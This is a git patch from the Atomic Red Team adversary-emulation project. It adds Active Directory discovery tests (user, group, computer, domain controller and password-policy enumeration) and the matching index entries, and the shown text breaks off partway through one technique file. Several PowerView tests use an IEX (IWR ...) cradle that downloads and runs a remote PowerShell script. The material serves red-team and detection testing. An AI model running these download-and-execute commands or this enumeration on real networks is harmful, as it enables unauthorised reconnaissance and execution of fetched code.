From 1209d7b0f6fdfccbc9f02fb046bf24cd281b3194 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 14 Mar 2022 17:32:56 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs
 branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  18 ++-
 atomics/Indexes/Indexes-CSV/windows-index.csv |  18 ++-
 atomics/Indexes/Indexes-Markdown/index.md     |  18 ++-
 .../Indexes/Indexes-Markdown/windows-index.md |  18 ++-
 atomics/Indexes/index.yaml                    | 109 +++++++++++++++++-
 atomics/T1018/T1018.md                        |  99 +++++++++++++++-
 atomics/T1069.002/T1069.002.md                |  75 +++++++++++-
 atomics/T1087.002/T1087.002.md                |  35 +++++-
 atomics/T1201/T1201.md                        |  63 ++++++++++
 9 files changed, 422 insertions(+), 31 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 4e598d60..01e8bc05 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -782,7 +782,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
-discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -791,9 +792,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
-discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
-discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
-discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -843,6 +846,8 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy -
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
 discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
@@ -862,7 +867,10 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
-discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2a0ede05..b504ab75 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -525,7 +525,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
-discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -534,9 +535,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
-discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
-discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
-discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -565,6 +568,8 @@ discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a
 discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
@@ -578,7 +583,10 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9
 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
 discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
-discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 0c8c1184..599eca55 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1283,7 +1283,8 @@
   - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
   - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
   - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
-  - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
+  - Atomic Test #11: Get-DomainUser with PowerView [windows]
+  - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1293,9 +1294,11 @@
   - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
   - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
   - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
-  - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
-  - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
-  - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+  - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
   - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -1355,6 +1358,8 @@
   - Atomic Test #5: Examine local password policy - Windows [windows]
   - Atomic Test #6: Examine domain password policy - Windows [windows]
   - Atomic Test #7: Examine password policy - macOS [macos]
+  - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1379,7 +1384,10 @@
   - Atomic Test #13: Remote System Discovery - ip route [linux]
   - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
   - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
-  - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #18: Get-DomainController with PowerView [windows]
+  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 9aca2c0d..0b9cc997 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -907,7 +907,8 @@
   - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
   - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
   - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
-  - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
+  - Atomic Test #11: Get-DomainUser with PowerView [windows]
+  - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -917,9 +918,11 @@
   - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
   - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
   - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
-  - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
-  - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
-  - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+  - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
   - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -958,6 +961,8 @@
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
   - Atomic Test #5: Examine local password policy - Windows [windows]
   - Atomic Test #6: Examine domain password policy - Windows [windows]
+  - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -976,7 +981,10 @@
   - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
   - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
   - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
-  - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #18: Get-DomainController with PowerView [windows]
+  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 32ccfe39..c4eb414d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -55101,6 +55101,19 @@ discovery:
           -Server #{domain}
 
 '
+    - name: Get-DomainUser with PowerView
+      auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
+      description: 'Utilizing PowerView, run Get-DomainUser to identify the domain
+        users. Upon execution, Users within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+        name: powershell
     - name: Enumerate Active Directory Users with ADSISearcher
       auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
       description: |
@@ -55306,6 +55319,19 @@ discovery:
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
         name: command_prompt
+    - name: Enumerate Active Directory Groups with Get-AdGroup
+      auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+      description: |
+        The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+        Upon successful execution a listing of groups will output with their paths in AD.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: 'Get-AdGroup -Filter *
+
+'
     - name: Enumerate Active Directory Groups with ADSISearcher
       auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
       description: |
@@ -55371,6 +55397,19 @@ discovery:
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
         name: powershell
+    - name: Get-DomainGroup with PowerView
+      auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
+      description: 'Utilizing PowerView, run Get-DomainGroup to identify the domain
+        groups. Upon execution, Groups within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+        name: powershell
   T1482:
     technique:
       external_references:
@@ -56940,6 +56979,32 @@ discovery:
       executor:
         command: pwpolicy getaccountpolicies
         name: bash
+    - name: Get-DomainPolicy with PowerView
+      auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+      description: 'Utilizing PowerView, run Get-DomainPolicy to return the default
+        domain policy or the domain controller policy for the current domain or a
+        specified domain/domain controller.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+        name: powershell
+    - name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+      auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
+      description: |
+        The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+        Upon successful execution a listing of the policy implemented will display.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-addefaultdomainpasswordpolicy
   T1120:
     technique:
       created: '2017-05-31T21:31:28.471Z'
@@ -57612,6 +57677,20 @@ discovery:
             Write-Host $Computer}
         name: powershell
         elevation_required: false
+    - name: Enumerate Active Directory Computers with Get-AdComputer
+      auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+      description: |
+        The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+        Upon successful execution a listing of Computers will output with their paths in AD.
+        Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-AdComputer -Filter *
+
+'
     - name: Enumerate Active Directory Computers with ADSISearcher
       auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
       description: |
@@ -57623,7 +57702,35 @@ discovery:
       executor:
         name: powershell
         elevation_required: false
-        command: ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+        command: '([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+
+'
+    - name: Get-DomainController with PowerView
+      auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
+      description: 'Utilizing PowerView, run Get-DomainController to identify the
+        Domain Controller. Upon execution, information about the domain controller
+        within the domain will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+        name: powershell
+    - name: Get-wmiobject to Enumerate Domain Controllers
+      auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+      description: |
+        The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+        Upon successful execution a listing of Systems from AD will output with their paths.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-wmiobject -class ds_computer -namespace root\directory\ldap
   T1518.001:
     technique:
       id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index 3055bdc6..d835dbd4 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -36,7 +36,13 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition
 
 - [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)
 
-- [Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-16---enumerate-active-directory-computers-with-adsisearcher)
+- [Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-16---enumerate-active-directory-computers-with-get-adcomputer)
+
+- [Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-17---enumerate-active-directory-computers-with-adsisearcher)
+
+- [Atomic Test #18 - Get-DomainController with PowerView](#atomic-test-18---get-domaincontroller-with-powerview)
+
+- [Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers](#atomic-test-19---get-wmiobject-to-enumerate-domain-controllers)
 
 
 <br/>
@@ -639,7 +645,37 @@ write-host "This PC must be manually added to a domain."
 <br/>
 <br/>
 
-## Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher
+## Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer
+The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+Upon successful execution a listing of Computers will output with their paths in AD.
+Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-AdComputer -Filter *
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher
 The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
 Upon successful execution a listing of computers will output with their paths in AD.
 Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
@@ -666,4 +702,63 @@ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearc
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #18 - Get-DomainController with PowerView
+Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b9d2e8ca-5520-4737-8076-4f08913da2c4
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
